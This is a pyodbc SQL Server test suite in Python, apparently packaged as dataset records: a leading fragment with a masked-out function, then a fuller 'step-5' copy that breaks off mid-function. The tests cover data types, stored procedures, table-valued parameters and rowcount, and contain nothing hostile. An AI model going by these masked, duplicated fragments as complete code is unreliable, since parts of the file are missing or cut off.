1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"\"\"Ensure `with` rolls back if an exception is raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (1)')\n cnxn.commit()\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute('insert into t1 values (2)')\n cursor.execute('delete from bogus')\n cursor.execute('select max(n) from t1')\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n value = cursor.execute('select ?', None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\ndef test_func_param(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop function func1')\n except:\n pass\n cursor.execute(\n \"\"\"\n create function func1 (@testparam varchar(4))\n returns @rettest table (param varchar(4))\n as\n begin\n insert @rettest\n select @testparam\n return\n end\n \"\"\"\n )\n cursor.commit()\n value = cursor.execute('select * from func1(?)', 'test').fetchone()[0]\n assert value == 'test'\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(3), xΏz varchar(4))')\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n cursor.execute(\n f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\"\n )\n col_count = len([col.column_name for col in cursor.columns(table_name)]\n )\n assert col_count == 1\n cursor.execute(f'drop table {table_name}')\n\n\n<mask token>\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute('insert into t1 values (?)', v)\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\ndef test_emoticons_as_literal(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute(f\"insert into t1 values (N'{v}')\")\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\ndef _test_tvp(cursor: pyodbc.Cursor, diff_schema):\n pyodbc.native_uuid = True\n procname = 'SelectTVP'\n typename = 'TestTVP'\n if diff_schema:\n schemaname = 'myschema'\n procname = schemaname + '.' + procname\n typenameonly = typename\n typename = schemaname + '.' + typename\n try:\n cursor.execute('drop procedure ' + procname)\n except:\n pass\n try:\n cursor.execute('drop type ' + typename)\n except:\n pass\n if diff_schema:\n try:\n cursor.execute('drop schema ' + schemaname)\n except:\n pass\n cursor.commit()\n if diff_schema:\n cursor.execute('CREATE SCHEMA myschema')\n cursor.commit()\n cursor.execute(\n f\"\"\"\n CREATE TYPE {typename} AS TABLE(\n c01 VARCHAR(255),\n c02 VARCHAR(MAX),\n c03 VARBINARY(255),\n c04 VARBINARY(MAX),\n c05 BIT,\n c06 DATE,\n c07 TIME,\n c08 DATETIME2(5),\n c09 BIGINT,\n c10 FLOAT,\n c11 NUMERIC(38, 24),\n c12 UNIQUEIDENTIFIER)\n \"\"\"\n )\n cursor.commit()\n cursor.execute(\n f\"\"\"\n CREATE PROCEDURE {procname} @TVP {typename} READONLY\n AS SELECT * FROM @TVP;\n \"\"\"\n )\n cursor.commit()\n VERY_LONG_LEN = 2000000\n long_string = ''.join(chr(i) for i in range(32, 127))\n long_bytearray = bytes(list(range(255)))\n very_long_string = long_string * (VERY_LONG_LEN // len(long_string))\n very_long_bytearray = long_bytearray * (VERY_LONG_LEN // len(\n long_bytearray))\n params = [('abc', 'abc', bytes([209, 206, 250, 206]), bytes([15, 241, \n 206, 202, 254]), True, date(1997, 8, 29), time(9, 13, 39), datetime\n (2018, 11, 13, 13, 33, 26, 298420), 1234567, 3.14, Decimal(\n '31234567890123.141243449787580175325274'), uuid.UUID(\n '4fe34a93-e574-04cc-200a-353f0d1770b1')), ('', '', bytes([0, 1, 2, \n 3, 4]), bytes([0, 1, 2, 3, 4, 5]), False, date(1, 1, 1), time(0, 0,\n 0), datetime(1, 1, 1, 0, 0, 0, 0), -9223372036854775808, -1.79e+308,\n Decimal('0.000000000000000000000001'), uuid.UUID(\n '33f7504c-2bac-1b83-01d1-7434a7ba6a17')), (long_string,\n very_long_string, bytes(long_bytearray), bytes(very_long_bytearray),\n True, date(9999, 12, 31), time(23, 59, 59), datetime(9999, 12, 31, \n 23, 59, 59, 999990), 9223372036854775807, 1.79e+308, Decimal(\n '99999999999999.999999999999999999999999'), uuid.UUID(\n 'ffffffff-ffff-ffff-ffff-ffffffffffff'))]\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = [tuple(row) for row in cursor.execute(\n f'exec {procname} ?', p1).fetchall()]\n for row, param in zip(result_array, params):\n if row != param:\n for r, p in zip(row, param):\n assert r == p\n params = []\n p1 = [params]\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = cursor.execute(f'exec {procname} ?', p1).fetchall()\n assert result_array == params\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp(cursor: pyodbc.Cursor):\n _test_tvp(cursor, False)\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\ndef get_sqlserver_version(cursor: pyodbc.Cursor):\n \"\"\"\n Returns the major version: 8-->2000, 9-->2005, 10-->2008\n \"\"\"\n cursor.execute(\"exec master..xp_msver 'ProductVersion'\")\n row = cursor.fetchone()\n return int(row.Character_Value.split('.', 1)[0])\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. This simplifies the tests by letting us put None into\n an array of other lengths and pass them here, moving the special case check into one place.\n \"\"\"\n if length is None:\n return None\n v = 'á'\n remaining = max(0, length - len(v))\n if remaining:\n seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n if remaining <= len(seed):\n v += seed\n else:\n c = remaining + len(seed) - 1 // len(seed)\n v += seed * c\n if encoding:\n v = v.encode(encoding)\n v = v[:length]\n return v\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os, uuid, re, sys\nfrom decimal import Decimal\nfrom datetime import date, time, datetime\nfrom functools import lru_cache\nfrom typing import Iterator\n\nimport pyodbc, pytest\n\n\n# WARNING: Wow Microsoft always manages to do the stupidest thing possible always trying to be\n# smarter than everyone. I worked with their APIs for since before \"OLE\" and it has always\n# been a nanny state. They won't read the UID and PWD from odbc.ini because it isn't secure.\n# Really? Less secure than what? The next hack someone is going to use. Do the straight\n# forward thing and explain how to secure it. it isn't their business how I deploy and secure.\n#\n# For every other DB we use a single default DSN but you can pass your own via an environment\n# variable. For SS, we can't just use a default DSN unless you want to go trusted. (Which is\n# more secure? No.) It'll be put into .bashrc most likely. Way to go. Now I'll go rename\n# all of the others to DB specific names instead of PYODBC_CNXNSTR. Hot garbage as usual.\n\nCNXNSTR = os.environ.get('PYODBC_SQLSERVER', 'DSN=pyodbc-sqlserver')\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=attrs_before)\n\n\nDRIVER = connect().getinfo(pyodbc.SQL_DRIVER_NAME)\n\nIS_FREEDTS = bool(re.search('tsodbc', DRIVER, flags=re.IGNORECASE))\nIS_MSODBCSQL = bool(re.search(r'(msodbcsql|sqlncli|sqlsrv32\\.dll)', DRIVER, re.IGNORECASE))\n\n\ndef _get_sqlserver_year():\n \"\"\"\n Returns the release year of the current version of SQL Server, used to skip tests for\n features that are not supported. If the current DB is not SQL Server, 0 is returned.\n \"\"\"\n # We used to use the major version, but most documentation on the web refers to the year\n # (e.g. SQL Server 2019) so we'll use that for skipping tests that do not apply.\n if not IS_MSODBCSQL:\n return 0\n cnxn = connect()\n cursor = cnxn.cursor()\n row = cursor.execute(\"exec master..xp_msver 'ProductVersion'\").fetchone()\n major = row.Character_Value.split('.', 1)[0]\n return {\n # https://sqlserverbuilds.blogspot.com/\n '8': 2000, '9': 2005, '10': 2008, '11': 2012, '12': 2014,\n '13': 2016, '14': 2017, '15': 2019, '16': 2022\n }[major]\n\n\nSQLSERVER_YEAR = _get_sqlserver_year()\n\n\[email protected]()\ndef cursor() -> Iterator[pyodbc.Cursor]:\n cnxn = connect()\n cur = cnxn.cursor()\n\n cur.execute(\"drop table if exists t1\")\n cur.execute(\"drop table if exists t2\")\n cur.execute(\"drop table if exists t3\")\n cnxn.commit()\n\n yield cur\n\n if not cnxn.closed:\n cur.close()\n cnxn.close()\n\n\ndef test_text(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'text')\n\n\ndef test_varchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varchar')\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\[email protected](SQLSERVER_YEAR < 2005, reason='(max) not supported until 2005')\ndef test_unicode_longmax(cursor: pyodbc.Cursor):\n # Issue 188:\tSegfault when fetching NVARCHAR(MAX) data over 511 bytes\n cursor.execute(\"select cast(replicate(N'x', 512) as nvarchar(max))\")\n\n\ndef test_char(cursor: pyodbc.Cursor):\n value = \"testing\"\n cursor.execute(\"create table t1(s char(7))\")\n cursor.execute(\"insert into t1 values(?)\", \"testing\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 0x123456789, 0x7FFFFFFF, 0xFFFFFFFF,\n 0x123456789])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n # python allows integers of any size, bigger than an 8 byte int can contain\n input = 9999999999999999999999999999999999999\n cursor.execute(\"create table t1(d bigint)\")\n with pytest.raises(OverflowError):\n cursor.execute(\"insert into t1 values (?)\", input)\n result = cursor.execute(\"select * from t1\").fetchall()\n assert result == []\n\n\ndef test_float(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'float', [None, -200, -1, 0, 1, 1234.5, -200, .00012345])\n\n\ndef test_non_numeric_float(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(d float)\")\n for input in (float('+Infinity'), float('-Infinity'), float('NaN')):\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute(\"insert into t1 values (?)\", input)\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\ndef test_getinfo_string():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CATALOG_NAME_SEPARATOR)\n assert isinstance(value, str)\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n # Issue 89 with FreeTDS: Multiple selects (or catalog functions that issue selects) without\n # fetches seem to confuse the driver.\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\ndef test_decode_meta(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure column names with non-ASCII characters are converted using the configured encodings.\n \"\"\"\n # This is from GitHub issue #190\n cursor.execute(\"create table t1(a int)\")\n cursor.execute(\"insert into t1 values (1)\")\n cursor.execute('select a as \"Tipología\" from t1')\n assert cursor.description[0][0] == \"Tipología\"\n\n\ndef test_exc_integrity(cursor: pyodbc.Cursor):\n \"Make sure an IntegretyError is raised\"\n # This is really making sure we are properly encoding and comparing the SQLSTATEs.\n cursor.execute(\"create table t1(s1 varchar(10) primary key)\")\n cursor.execute(\"insert into t1 values ('one')\")\n with pytest.raises(pyodbc.IntegrityError):\n cursor.execute(\"insert into t1 values ('one')\")\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"More than one bind and select on a cursor\"\n cursor.execute(\"create table t1(n int)\")\n cursor.execute(\"insert into t1 values (?)\", 1)\n cursor.execute(\"insert into t1 values (?)\", 2)\n cursor.execute(\"insert into t1 values (?)\", 3)\n for _ in range(3):\n cursor.execute(\"select n from t1 where n < ?\", 10)\n cursor.execute(\"select n from t1 where n < 3\")\n\n\ndef test_different_bindings(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(n int)\")\n cursor.execute(\"create table t2(d datetime)\")\n cursor.execute(\"insert into t1 values (?)\", 1)\n cursor.execute(\"insert into t2 values (?)\", datetime.now())\n\n\nSMALL_FENCEPOST_SIZES = [None, 0, 1, 255, 256, 510, 511, 512, 1023, 1024, 2047, 2048, 4000]\nLARGE_FENCEPOST_SIZES = SMALL_FENCEPOST_SIZES + [4095, 4096, 4097, 10 * 1024, 20 * 1024]\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n\n if datatype == 'text':\n cursor.execute(f\"create table t1(c1 {datatype})\")\n else:\n maxlen = lengths[-1]\n cursor.execute(f\"create table t1(c1 {datatype}({maxlen}))\")\n\n for length in lengths:\n cursor.execute(\"delete from t1\")\n\n encoding = (datatype in ('blob', 'varbinary')) and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n\n try:\n cursor.execute(\"insert into t1 values(?)\", value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef _test_scalar(cursor: pyodbc.Cursor, datatype, values):\n \"\"\"\n A simple test wrapper for types that are identical when written and read.\n \"\"\"\n cursor.execute(f\"create table t1(c1 {datatype})\")\n for value in values:\n cursor.execute(\"delete from t1\")\n cursor.execute(\"insert into t1 values (?)\", value)\n v = cursor.execute(\"select c1 from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\ndef test_nonnative_uuid(cursor: pyodbc.Cursor):\n # The default is False meaning we should return a string. Note that\n # SQL Server seems to always return uppercase.\n value = uuid.uuid4()\n cursor.execute(\"create table t1(n uniqueidentifier)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n pyodbc.native_uuid = False\n result = cursor.execute(\"select n from t1\").fetchval()\n assert isinstance(result, str)\n assert result == str(value).upper()\n pyodbc.native_uuid = True\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n # When true, we should return a uuid.UUID object.\n value = uuid.uuid4()\n cursor.execute(\"create table t1(n uniqueidentifier)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n pyodbc.native_uuid = True\n result = cursor.execute(\"select n from t1\").fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\ndef test_nextset(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(i int)\")\n for i in range(4):\n cursor.execute(\"insert into t1(i) values(?)\", i)\n\n cursor.execute(\n \"\"\"\n select i from t1 where i < 2 order by i;\n select i from t1 where i >= 2 order by i\n \"\"\")\n\n for i, row in enumerate(cursor):\n assert i == row.i\n\n assert cursor.nextset()\n\n for i, row in enumerate(cursor):\n assert i + 2 == row.i\n\n\[email protected](IS_FREEDTS, reason='https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\ndef test_fixed_unicode(cursor: pyodbc.Cursor):\n value = \"t\\xebsting\"\n cursor.execute(\"create table t1(s nchar(7))\")\n cursor.execute(\"insert into t1 values(?)\", \"t\\xebsting\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n # If we alloc'd wrong, the test below might work because of an embedded NULL\n assert v == value\n\n\ndef test_chinese(cursor: pyodbc.Cursor):\n v = '我的'\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n row = cursor.fetchone()\n assert row[0] == v\n\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n rows = cursor.fetchall()\n assert rows[0][0] == v\n\n\ndef test_bit(cursor: pyodbc.Cursor):\n value = True\n cursor.execute(\"create table t1(b bit)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n v = cursor.execute(\"select b from t1\").fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\ndef test_decimal(cursor: pyodbc.Cursor):\n # From test provided by planders (thanks!) in Issue 91\n\n for (precision, scale, negative) in [\n (1, 0, False), (1, 0, True), (6, 0, False), (6, 2, False), (6, 4, True),\n (6, 6, True), (38, 0, False), (38, 10, False), (38, 38, False), (38, 0, True),\n (38, 10, True), (38, 38, True)]:\n\n try:\n cursor.execute(\"drop table t1\")\n except:\n pass\n\n cursor.execute(f\"create table t1(d decimal({precision}, {scale}))\")\n\n # Construct a decimal that uses the maximum precision and scale.\n sign = negative and '-' or ''\n before = '9' * (precision - scale)\n after = scale and ('.' + '9' * scale) or ''\n decStr = f'{sign}{before}{after}'\n value = Decimal(decStr)\n\n cursor.execute(\"insert into t1 values(?)\", value)\n\n v = cursor.execute(\"select d from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5)) # prints as 1.23E+7\n cursor.execute(\"create table t1(d decimal(10, 2))\")\n cursor.execute(\"insert into t1 values (?)\", value)\n result = cursor.execute(\"select * from t1\").fetchone()[0]\n assert result == value\n\n\ndef test_subquery_params(cursor: pyodbc.Cursor):\n \"\"\"Ensure parameter markers work in a subquery\"\"\"\n cursor.execute(\"create table t1(id integer, s varchar(20))\")\n cursor.execute(\"insert into t1 values (?,?)\", 1, 'test')\n row = cursor.execute(\"\"\"\n select x.id\n from (\n select id\n from t1\n where s = ?\n and id between ? and ?\n ) x\n \"\"\", 'test', 1, 10).fetchone()\n assert row is not None\n assert row[0] == 1\n\n\ndef test_close_cnxn():\n \"\"\"Make sure using a Cursor after closing its connection doesn't crash.\"\"\"\n\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"drop table if exists t1\")\n cursor.execute(\"create table t1(id integer, s varchar(20))\")\n cursor.execute(\"insert into t1 values (?,?)\", 1, 'test')\n cursor.execute(\"select * from t1\")\n\n cnxn.close()\n\n # Now that the connection is closed, we expect an exception. (If the code attempts to use\n # the HSTMT, we'll get an access violation instead.)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute(\"select * from t1\")\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(s varchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", \"\")\n\n\ndef test_empty_string_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = \"\"\n cursor = cnxn.cursor()\n cursor.execute(\"create table t1(s varchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", value)\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_fixed_str(cursor: pyodbc.Cursor):\n value = \"testing\"\n cursor.execute(\"create table t1(s char(7))\")\n cursor.execute(\"insert into t1 values(?)\", value)\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n # If we alloc'd wrong, the test below might work because of an embedded NULL\n assert v == value\n\n\ndef test_empty_unicode(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(s nvarchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", \"\")\n\n\ndef test_empty_unicode_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = \"\"\n cursor = cnxn.cursor()\n cursor.execute(\"create table t1(s nvarchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", value)\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(s varchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", \"1\")\n row = cursor.execute(\"select * from t1\").fetchone()\n assert row[0] == \"1\"\n assert row[-1] == \"1\"\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.')) # 1.3.1 etc.\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008,\n reason='Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = date.today()\n\n cursor.execute(\"create table t1(d date)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select d from t1\").fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008,\n reason='Time not supported until 2008?')\ndef test_time(cursor: pyodbc.Cursor):\n value = datetime.now().time()\n\n # We aren't yet writing values using the new extended time type so the value written to the\n # database is only down to the second.\n value = value.replace(microsecond=0)\n\n cursor.execute(\"create table t1(t time)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select t from t1\").fetchone()[0]\n assert isinstance(result, time)\n assert value == result\n\n\ndef test_datetime(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n\n cursor.execute(\"create table t1(dt datetime)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction(cursor: pyodbc.Cursor):\n # SQL Server supports milliseconds, but Python's datetime supports nanoseconds, so the most\n # granular datetime supported is xxx000.\n\n value = datetime(2007, 1, 15, 3, 4, 5, 123000)\n\n cursor.execute(\"create table t1(dt datetime)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction_rounded(cursor: pyodbc.Cursor):\n # SQL Server supports milliseconds, but Python's datetime supports nanoseconds. pyodbc\n # rounds down to what the database supports.\n\n full = datetime(2007, 1, 15, 3, 4, 5, 123456)\n rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)\n\n cursor.execute(\"create table t1(dt datetime)\")\n cursor.execute(\"insert into t1 values (?)\", full)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert rounded == result\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n\n cursor.execute(\"create table t1(dt datetime2)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_sp_results(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n select top 10 name, id, xtype, refdate\n from sysobjects\n \"\"\")\n rows = cursor.execute(\"exec proc1\").fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10 # there has to be at least 10 items in sysobjects\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n\n # Note: I've used \"set nocount on\" so that we don't get the number of rows deleted from\n # #tmptable. If you don't do this, you'd need to call nextset() once to skip it.\n\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\")\n cursor.execute(\"exec proc1\")\n assert cursor.description is not None\n assert len(cursor.description) == 4\n\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10 # there has to be at least 10 items in sysobjects\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_vartbl(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n declare @tmptbl table(name varchar(100), id int, xtype varchar(4), refdate datetime)\n\n insert into @tmptbl\n select top 10 name, id, xtype, refdate\n from sysobjects\n\n select * from @tmptbl\n \"\"\")\n cursor.execute(\"exec proc1\")\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10 # there has to be at least 10 items in sysobjects\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n # Reported in the forums that passing two datetimes to a stored procedure doesn't work.\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\")\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\")\n cursor.execute(\"exec test_sp ?, ?\", datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0 # 0 years apart\n\n\ndef test_sp_with_none(cursor: pyodbc.Cursor):\n # Reported in the forums that passing None caused an error.\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\")\n cursor.execute(\n \"\"\"\n create procedure test_sp(@x varchar(20))\n AS\n declare @y varchar(20)\n set @y = @x\n select @y\n \"\"\")\n cursor.execute(\"exec test_sp ?\", None)\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] is None # 0 years apart\n\n\n#\n# rowcount\n#\n\n\ndef test_rowcount_delete(cursor: pyodbc.Cursor):\n assert cursor.rowcount == -1\n cursor.execute(\"create table t1(i int)\")\n count = 4\n for i in range(count):\n cursor.execute(\"insert into t1 values (?)\", i)\n cursor.execute(\"delete from t1\")\n assert cursor.rowcount == count\n\n\ndef test_rowcount_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code. On the other hand, we could hardcode a zero return value.\n \"\"\"\n cursor.execute(\"create table t1(i int)\")\n # This is a different code path internally.\n cursor.execute(\"delete from t1\")\n assert cursor.rowcount == 0\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute(\"create table t1(i int)\")\n count = 4\n for i in range(count):\n cursor.execute(\"insert into t1 values (?)\", i)\n cursor.execute(\"select * from t1\")\n assert cursor.rowcount == -1\n\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\ndef test_rowcount_reset(cursor: pyodbc.Cursor):\n \"Ensure rowcount is reset after DDL\"\n cursor.execute(\"create table t1(i int)\")\n count = 4\n for i in range(count):\n cursor.execute(\"insert into t1 values (?)\", i)\n assert cursor.rowcount == 1\n\n cursor.execute(\"create table t2(i int)\")\n ddl_rowcount = (0 if IS_FREEDTS else -1)\n assert cursor.rowcount == ddl_rowcount\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(i int)\")\n cursor.execute(\"insert into t1 values (1)\")\n v = cursor.execute(\"delete from t1\")\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute(\"create table t1(i int)\")\n # This is a different code path internally.\n v = cursor.execute(\"delete from t1\")\n assert v == cursor\n\n\ndef test_retcursor_select(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(i int)\")\n cursor.execute(\"insert into t1 values (1)\")\n v = cursor.execute(\"select * from t1\")\n assert v == cursor\n\n\ndef table_with_spaces(cursor: pyodbc.Cursor):\n \"Ensure we 